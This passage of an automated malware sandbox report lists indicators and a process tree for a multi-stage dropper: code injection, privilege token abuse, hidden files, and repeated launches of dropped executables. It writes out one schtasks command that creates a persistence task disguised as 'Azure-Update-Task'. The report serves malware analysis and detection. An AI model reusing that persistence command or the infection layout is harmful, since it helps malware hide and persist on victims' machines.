HTTP User-Agent header	77	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1840	Sun15223697c98.exe
1840	Sun15223697c98.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
3964	powershell.exe
3964	powershell.exe
2996	Process not Found
2996	Process not Found
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
3424	WerFault.exe
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
3424	WerFault.exe
3424	WerFault.exe
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe
1612	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2996	Process not Found

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
1840	Sun15223697c98.exe
4516	MicrosoftEdgeCP.exe
4516	MicrosoftEdgeCP.exe
4516	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
7060	rsvdeid
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
6096	rsvdeid
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4964	6807523.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3136	Sun150faeb3537d.exe
Token: SeAssignPrimaryTokenPrivilege	3136	Sun150faeb3537d.exe
Token: SeLockMemoryPrivilege	3136	Sun150faeb3537d.exe
Token: SeIncreaseQuotaPrivilege	3136	Sun150faeb3537d.exe
Token: SeMachineAccountPrivilege	3136	Sun150faeb3537d.exe
Token: SeTcbPrivilege	3136	Sun150faeb3537d.exe
Token: SeSecurityPrivilege	3136	Sun150faeb3537d.exe
Token: SeTakeOwnershipPrivilege	3136	Sun150faeb3537d.exe
Token: SeLoadDriverPrivilege	3136	Sun150faeb3537d.exe
Token: SeSystemProfilePrivilege	3136	Sun150faeb3537d.exe
Token: SeSystemtimePrivilege	3136	Sun150faeb3537d.exe
Token: SeProfSingleProcessPrivilege	3136	Sun150faeb3537d.exe
Token: SeIncBasePriorityPrivilege	3136	Sun150faeb3537d.exe
Token: SeCreatePagefilePrivilege	3136	Sun150faeb3537d.exe
Token: SeCreatePermanentPrivilege	3136	Sun150faeb3537d.exe
Token: SeBackupPrivilege	3136	Sun150faeb3537d.exe
Token: SeRestorePrivilege	3136	Sun150faeb3537d.exe
Token: SeShutdownPrivilege	3136	Sun150faeb3537d.exe
Token: SeDebugPrivilege	3136	Sun150faeb3537d.exe
Token: SeAuditPrivilege	3136	Sun150faeb3537d.exe
Token: SeSystemEnvironmentPrivilege	3136	Sun150faeb3537d.exe
Token: SeChangeNotifyPrivilege	3136	Sun150faeb3537d.exe
Token: SeRemoteShutdownPrivilege	3136	Sun150faeb3537d.exe
Token: SeUndockPrivilege	3136	Sun150faeb3537d.exe
Token: SeSyncAgentPrivilege	3136	Sun150faeb3537d.exe
Token: SeEnableDelegationPrivilege	3136	Sun150faeb3537d.exe
Token: SeManageVolumePrivilege	3136	Sun150faeb3537d.exe
Token: SeImpersonatePrivilege	3136	Sun150faeb3537d.exe
Token: SeCreateGlobalPrivilege	3136	Sun150faeb3537d.exe
Token: 31	3136	Sun150faeb3537d.exe
Token: 32	3136	Sun150faeb3537d.exe
Token: 33	3136	Sun150faeb3537d.exe
Token: 34	3136	Sun150faeb3537d.exe
Token: 35	3136	Sun150faeb3537d.exe
Token: SeDebugPrivilege	3936	Sun157ff8e4440aa.exe
Token: SeDebugPrivilege	3768	Sun1584240df9fe73a3.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	744	2924801.exe
Token: SeDebugPrivilege	4436	2.exe
Token: SeDebugPrivilege	4364	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4460	3177034.exe
Token: SeDebugPrivilege	4808	3953857.exe
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeShutdownPrivilege	2996	Process not Found
Token: SeCreatePagefilePrivilege	2996	Process not Found
Token: SeRestorePrivilege	1612	WerFault.exe
Token: SeBackupPrivilege	1612	WerFault.exe
Token: SeBackupPrivilege	1612	WerFault.exe
Token: SeDebugPrivilege	3928	2468946.exe
Token: SeDebugPrivilege	3424	WerFault.exe
Token: SeDebugPrivilege	4344	4051283.exe
Token: SeDebugPrivilege	1612	WerFault.exe
Token: SeDebugPrivilege	4768	8.exe
Token: SeDebugPrivilege	4824	WerFault.exe
Token: SeDebugPrivilege	4676	WerFault.exe
Token: SeDebugPrivilege	4668	setup_2.exe
Token: SeShutdownPrivilege	2996	Process not Found

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
2996	Process not Found
2996	Process not Found
2996	Process not Found
2996	Process not Found
5532	ultramediaburner.tmp
7008	installer.exe
2996	Process not Found
2996	Process not Found

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2996	Process not Found
720	MicrosoftEdge.exe
4516	MicrosoftEdgeCP.exe
6272	cmd.exe
4516	MicrosoftEdgeCP.exe
6468	MicrosoftEdge.exe
4560	MicrosoftEdgeCP.exe
4560	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 628 wrote to memory of 836	628	setup_x86_x64_install.exe	68
PID 628 wrote to memory of 836	628	setup_x86_x64_install.exe	68
PID 628 wrote to memory of 836	628	setup_x86_x64_install.exe	68
PID 836 wrote to memory of 1092	836	setup_installer.exe	69
PID 836 wrote to memory of 1092	836	setup_installer.exe	69
PID 836 wrote to memory of 1092	836	setup_installer.exe	69
PID 1092 wrote to memory of 2056	1092	setup_install.exe	72
PID 1092 wrote to memory of 2056	1092	setup_install.exe	72
PID 1092 wrote to memory of 2056	1092	setup_install.exe	72
PID 1092 wrote to memory of 2176	1092	setup_install.exe	73
PID 1092 wrote to memory of 2176	1092	setup_install.exe	73
PID 1092 wrote to memory of 2176	1092	setup_install.exe	73
PID 1092 wrote to memory of 2344	1092	setup_install.exe	74
PID 1092 wrote to memory of 2344	1092	setup_install.exe	74
PID 1092 wrote to memory of 2344	1092	setup_install.exe	74
PID 1092 wrote to memory of 2472	1092	setup_install.exe	75
PID 1092 wrote to memory of 2472	1092	setup_install.exe	75
PID 1092 wrote to memory of 2472	1092	setup_install.exe	75
PID 1092 wrote to memory of 2688	1092	setup_install.exe	76
PID 1092 wrote to memory of 2688	1092	setup_install.exe	76
PID 1092 wrote to memory of 2688	1092	setup_install.exe	76
PID 1092 wrote to memory of 2748	1092	setup_install.exe	80
PID 1092 wrote to memory of 2748	1092	setup_install.exe	80
PID 1092 wrote to memory of 2748	1092	setup_install.exe	80
PID 1092 wrote to memory of 2796	1092	setup_install.exe	77
PID 1092 wrote to memory of 2796	1092	setup_install.exe	77
PID 1092 wrote to memory of 2796	1092	setup_install.exe	77
PID 1092 wrote to memory of 2836	1092	setup_install.exe	79
PID 1092 wrote to memory of 2836	1092	setup_install.exe	79
PID 1092 wrote to memory of 2836	1092	setup_install.exe	79
PID 1092 wrote to memory of 3908	1092	setup_install.exe	78
PID 1092 wrote to memory of 3908	1092	setup_install.exe	78
PID 1092 wrote to memory of 3908	1092	setup_install.exe	78
PID 1092 wrote to memory of 3972	1092	setup_install.exe	82
PID 1092 wrote to memory of 3972	1092	setup_install.exe	82
PID 1092 wrote to memory of 3972	1092	setup_install.exe	82
PID 2056 wrote to memory of 3964	2056	cmd.exe	81
PID 2056 wrote to memory of 3964	2056	cmd.exe	81
PID 2056 wrote to memory of 3964	2056	cmd.exe	81
PID 2472 wrote to memory of 4024	2472	cmd.exe	83
PID 2472 wrote to memory of 4024	2472	cmd.exe	83
PID 2472 wrote to memory of 4024	2472	cmd.exe	83
PID 2748 wrote to memory of 1840	2748	cmd.exe	84
PID 2748 wrote to memory of 1840	2748	cmd.exe	84
PID 2748 wrote to memory of 1840	2748	cmd.exe	84
PID 2688 wrote to memory of 2256	2688	cmd.exe	86
PID 2688 wrote to memory of 2256	2688	cmd.exe	86
PID 2688 wrote to memory of 2256	2688	cmd.exe	86
PID 2344 wrote to memory of 3104	2344	cmd.exe	85
PID 2344 wrote to memory of 3104	2344	cmd.exe	85
PID 2344 wrote to memory of 3104	2344	cmd.exe	85
PID 2176 wrote to memory of 3444	2176	cmd.exe	88
PID 2176 wrote to memory of 3444	2176	cmd.exe	88
PID 3972 wrote to memory of 1632	3972	cmd.exe	87
PID 3972 wrote to memory of 1632	3972	cmd.exe	87
PID 3972 wrote to memory of 1632	3972	cmd.exe	87
PID 2836 wrote to memory of 3136	2836	cmd.exe	91
PID 2836 wrote to memory of 3136	2836	cmd.exe	91
PID 2836 wrote to memory of 3136	2836	cmd.exe	91
PID 2796 wrote to memory of 3936	2796	cmd.exe	90
PID 2796 wrote to memory of 3936	2796	cmd.exe	90
PID 3908 wrote to memory of 3768	3908	cmd.exe	89
PID 3908 wrote to memory of 3768	3908	cmd.exe	89
PID 2256 wrote to memory of 3052	2256	Sun15b61bf18b0f1.exe	92

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4468	attrib.exe
6260	attrib.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2788

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2696
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:1700

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1404

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:596
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5392
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    - Executes dropped EXE
    PID:4916
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7040
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6336
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5848
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4920
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6848
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      4⤵
      Creates scheduled task(s)
      PID:6212
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6232
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4140
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3916
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4572
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5788
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6292
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5680
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1704
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5464
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:7128
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2276
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:568
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4708
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6732
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6264
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4832
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6784
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5640
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5656
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4016
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1764
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3668
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6348
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:6536
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5352
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6848
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4992
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:2992
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5704
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:7048
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4348
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3964
- C:\Users\Admin\AppData\Roaming\rsvdeid
  C:\Users\Admin\AppData\Roaming\rsvdeid
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:7060
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3148
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4948
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3800
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5980
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5920
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2688
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5952
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:188
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3976
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:2364
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4736
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:6356
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6864
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5452
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7052
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4100
- C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
  C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:3476
- - C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
    C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
    3⤵
    PID:4264
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5656
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:552
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:348
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:664
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:2284
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:5632
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:68
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1944
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6212
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:4992
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:7124
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5984
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5840
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:6952
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:1360
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4340
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:5256
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3480
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:6116
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3944
- C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
  C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
  2⤵
  - Suspicious use of SetThreadContext
  PID:5908
- - C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe
    C:\Users\Admin\AppData\Local\25eb2d70-8e4b-4053-8e92-2f671145a411\5E69.exe --Task
    3⤵
    PID:2676
- C:\Users\Admin\AppData\Roaming\rsvdeid
  C:\Users\Admin\AppData\Roaming\rsvdeid
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6096
- C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:4188
- - C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
    3⤵
    PID:3148
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  - Suspicious use of SetThreadContext
  PID:3456
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3800
